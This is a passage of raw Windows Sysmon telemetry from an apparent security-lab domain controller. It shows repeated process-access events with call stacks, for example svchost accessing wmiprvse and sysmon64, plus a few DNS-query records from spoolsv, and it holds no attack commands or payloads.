08:41:26.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001991Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001990Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001989Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001988Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001987Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001986Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001985Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001984Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001983Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001982Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.996{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001981Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.996{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001980Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.996{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 22542200x80000000000000002242Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.769{5D479F2C-16B1-5F84-2700-000000007F01}2024WIN-DC-35740600fe80::64fd:4c36:9a5d:fb14;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002241Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.769{5D479F2C-16B1-5F84-2700-000000007F01}2024WIN-DC-3574060010.0.1.14;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002240Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.620{5D479F2C-16B1-5F84-2700-000000007F01}2024WIN-DC-35740600fe80::64fd:4c36:9a5d:fb14;::ffff:10.0.1.14;C:\Windows\System32\spoolsv.exe 10341000x80000000000000002239Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.339{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B7-5F84-6500-000000007F01}2428C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002238Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002237Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002236Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002235Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002234Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002233Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002232Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002231Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002230Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002229Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.339{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16B7-5F84-6500-000000007F01}2428C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002228Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.339{5D479F2C-16B1-5F84-3000-000000007F01}26163792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16B7-5F84-6500-000000007F01}2428C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program 